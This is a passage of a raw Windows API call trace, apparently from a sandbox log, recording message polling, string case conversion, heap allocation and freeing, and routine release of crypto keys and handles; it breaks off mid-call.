PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.044] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.044] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0254.044] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.044] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0254.044] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.044] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.044] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.044] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.044] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.044] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.044] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0254.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.044] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0254.044] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.045] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.045] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.045] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.045] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.045] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.045] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.045] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.045] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.045] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.045] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.045] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.045] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0254.045] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.045] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.045] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.046] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.046] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.046] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0254.046] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.046] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0254.046] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.046] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0254.046] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.046] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0254.046] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.046] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0254.046] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.046] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.046] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0254.047] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.047] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0254.047] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.047] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.047] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.047] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.047] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.047] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.047] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.047] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.047] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.047] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.047] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.047] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.047] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.048] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.048] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.048] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.048] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.048] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.048] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.048] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.048] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0254.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0254.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0254.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0254.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0254.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0254.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0254.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.051] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.051] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0254.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.051] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0254.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0254.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0254.053] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0254.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0254.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0254.054] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0254.054] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0254.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0254.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0254.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.055] FreeLibrary (hLibModule=0x74d40000) returned 1 [0254.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0254.055] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.055] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0254.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.055] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0254.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0254.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0254.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0254.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0254.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0254.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0254.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0254.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa90 [0254.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0254.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.060] CloseHandle (hObject=0x268) returned 1 [0254.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0254.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0254.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0254.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 